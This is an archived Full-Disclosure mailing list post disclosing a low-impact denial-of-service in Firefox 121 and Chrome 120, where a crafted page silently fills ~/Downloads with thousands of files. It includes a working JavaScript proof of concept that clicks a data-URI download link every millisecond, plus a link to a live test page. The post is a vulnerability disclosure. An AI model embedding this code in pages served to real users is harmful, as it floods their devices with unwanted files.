lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAGUWgD83fc=PS=uV9-O9x1_jcNb2G1BZG426_=6xNED03dURNg@mail.gmail.com>
Date: Thu, 18 Jan 2024 12:15:00 +0200
From: Georgi Guninski <gguninski@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Minor firefox DoS - semi silently polluting ~/Downloads with
 files (part 2)

Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2)

Tested on: firefox 121 and chrome 120 on GNU/linux

Date: Thu Jan 18 08:38:28 AM UTC 2024

This is barely a DoS, but since it might affect Chrome too we decided
to disclose it.

If firefox user visits a specially crafted page, then firefox
may create many files in `~/Downloads`,
The user is notified about this in a small dialog, but there is
no option to stop the downloads.
The potential denial of service is that the user must manually
delete the created files and this might be PITA especially on
a phone.

The code basically is:
<pre>
URL = "data:text/plain;,a";//can be very large with no net traffic
link = document.createElement('a');
link.href = URL;
link.download = 'joro_';
document.body.appendChild(link);
function f() {
if( !confirm("This will ruin your device with probability up to 199.99%"))
    return;
setInterval("link.click();",1);//dobro
}
f();
</pre>
There is no network traffic and in about 90 seconds firefox 121 created
3434 files at speed about 38 files/second.

google chrome 120 prompts about multiple downloads, and if the user
allows it, it creates files at speed of 4.2 files/second, but
it gives modal prompts, which we couldn't close from the GUI and
had to kill the process.

[Test online][1]: if you are vulnerable

[1]: https://j.ludost.net/download2.html

-- 
guninski
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ